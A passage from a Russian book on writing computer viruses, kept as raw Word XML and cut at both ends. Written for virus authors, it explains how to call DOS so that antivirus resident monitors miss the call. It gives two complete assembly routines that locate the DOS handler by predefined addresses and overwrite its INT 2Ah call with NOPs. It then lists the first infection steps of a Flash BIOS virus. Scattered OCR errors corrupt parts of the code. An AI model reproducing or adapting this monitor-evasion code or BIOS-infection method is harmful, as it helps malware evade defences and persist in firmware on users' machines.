        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Итак, предположим, что гипотетический антивирусный супермонитор: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- отслеживает и блокирует попытки трассировки 21-го прерывания; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>- для контроля "опасных" функций DOS встраивается в начало обра-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ботчика прерывания INT 21h; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>- для предотвращения прямого обращения к DOS использует флаг,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сбрасываемый либо во вставленном фрагменте, либо в обработчике</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">прерывания 2Ah (более грамотный подход). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Эти действия монитора порождают соответствующие проблемы при</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">конструировании неотслеживаемого обращения к DOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Первая проблема достаточно просто решается с использованием "мето-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">да предопределенных адресов". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Для решения второй проблемы стоит проанализировать возможное</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>расположение в обработчике DOS точки перехода на антивирусный</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>монитор. Очевидно, это может быть точка 0 либо точка 1. В самом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>худшем случае можно допустить, что врезка происходит непосред-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ственно после команды проверки на максимальное значение номера</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>функции. Далее обработчик DOS "растекается" на многочисленные</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ручейки, поэтому отследить их все крайне затруднительно. По край-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ней мере, обработчики функций OFh, 3Dh и 5Fh попадают в разные</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ручейки. Однако, при использовании ограниченного набора функций</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>они могут разместиться и в одном ручейке, что намного упростит ре-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>шение данной задачи. Функции 3Ch-43h, отвечающие за создание, от-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>крытие, закрытие, чтение, запись, атрибуты и перемещение, действи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тельно располагаются в одном общем ручейке. Это позволяет</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>использовать адрес точки 2 для прямого обращения к DOS. Монито-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ры, скорее всего, не будут отслеживать эту точку. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Решение третьей проблемы также не вызовет особых затруднений.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Один из вариантов - замаскировать прерывания таймера и изменить</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вектор 8-го прерывания перед прямым обращением к DOS. Вместо из-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>менения вектора можно попробовать вставить инструкции IRET в нача-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ло текущего (антивирусного) обработчика. При использовании все того</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>же метода "предопределенных адресов" и, зная позицию инструкции</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>INT 2Ah в обработчике DOS, перед прямым обращением к DOS следу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ет просто заменить этот вызов двумя командами NOP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Пример реализации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Рассмотрим две подпрограммы, которые используются для прямого об-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ращения к DOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Подпрограмма SetAdr предназначена для определения адреса обработ-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>чика DOS методом предопределенных адресов. Для версий DOS, "пра-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вильный" адрес которых неизвестен, используется функция DOS 35h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">(получить вектор прерывания). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Подпрограмма CallDOS позволяет обращаться к DOS напрямую. В код</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>включена проверка на номер функции. Для "безопасных" функций</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">предусмотрен обычный вызов DOS при помощи инструкции INT 21h. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Процедура установки адреса (один из самых коротких,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;хотя и подозрительных вариантов реализации)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">SetAdr ргос near </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Устанавливаем указатель на таблицу в регистре SI</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov si,offset Table </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Читаем очередное значение сегмента и смещения из таблицы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Next: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov es,[si] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx,[si+2] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>; Проверяем контрольный код в слове, адрес которого получен</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;из таблицы. Если результат отрицательный, переходим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;к следующему элементу таблицы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp es:[bx],2ACDh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jnz Skip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Сохраняем адрес точки 2А</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov Ofs2A,bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov Seg2A,es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Сохраняем адрес точки 2 из таблицы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax, [si+4] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov Seg21 ,ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax, [si+6] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov Ofs21 ,ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Skip: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>; Переходим к следующему элементу таблицы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">add si,8 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Проверяем, не закончилась ли таблица. Если таблица закончилась, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;читаем адрес текущего обработчика прерывания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp [si], О</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jnz Next </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Читаем адреса текущего обработчика прерывания INT 21 h - метод </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;" предопределенных адресов" не сработал, точка входа не найдена </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax, 3521h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov Ofs21,bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov Seg21 ,es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Таблица позиций 2А и 2.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Table dw OFF03h, 5333h,OFF03h, 420Ah</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">dw OFDC8h, 41D1h,OFDC8h, 411Bh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>dw 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">SetAdr endp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Процедура прямого обращения к DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">CallDOS proc near </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если функция безопасна, вызываем прерывание обычным способом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp ah,3Bh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>jb Trivial</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp ah,42h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ja Trivial </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3аменяем вызов прерывания 2Ah на две команды MOP (9090h)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;в обработчике DOS, предварительно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;сохранив первоначальные значения кода </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov es,cs:Ofs2A </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx,cs:Seg2A </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,es:[bx] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov cs:Save, ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov es:[bx], 9090h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Вызываем напрямую прерывание DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pushf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call cs:dword ptr Ofs21 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Восстанавливаем вызов 2Ah</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">push bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov es,cs:Ofs2A</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov bx,cs:Seg2A</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,cs:Save</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov es:[bx], ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pop es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>-.Обычное обращение к DOS (используется для безопасных функций)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Trivial: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;B этом месте сохраняем значение для кода вызова INT 2Ah</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Save dw ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;0бработчик прерывания DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ofs21 dw ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Seg21 dw ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Адрес вызова INT 2Ah из обработчика DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ofs2A dw ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Seg2A dw ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">CallDOS endp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>Новое место для вирусов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Flash-память - энергонезависимая память, которая обеспечивает рабо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тоспособность EPROM со встроенной электрической схемой стирания и</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>перепрограммирования. Энергонезависимая память отличается от RAM</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">тем, что она не обнуляется при отсутствии напряжения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Flash BIOS - Flash-память, которая используется для хранения кода</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>BIOS. Она может быть перепрограммирована - это предусмотрено для</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>облегчения обновления BIOS. Такие микросхемы применяются в 90%</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>портативных компьютеров, в большинстве компьютеров 486DX2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">486DX4, Pentium. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Как известно, BIOS получает управление при запуске компьютера. Все</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>что нужно сделать вирмейкеру - это незаметно модифицировать BIOS,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">чтобы вирус стартовал перед загрузкой системы компьютера. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AMI Flash вирус</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Алгоритм работы вируса: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Проверить компьютер на наличие Flash BIOS; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Проверить Flash BIOS на зараженность (осуществить выход, если</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">она заражена); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Считать вектор INT 19h из таблицы (прерывание загрузки); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Прочесть первые 5 байт от точки входа INT 19h; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>5. Проверить BIOS на наличие свободного места для размещения ви-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">руса (поиск области нулей); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>6. Установить память Flash BIOS в режим записи (обычно она нахо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
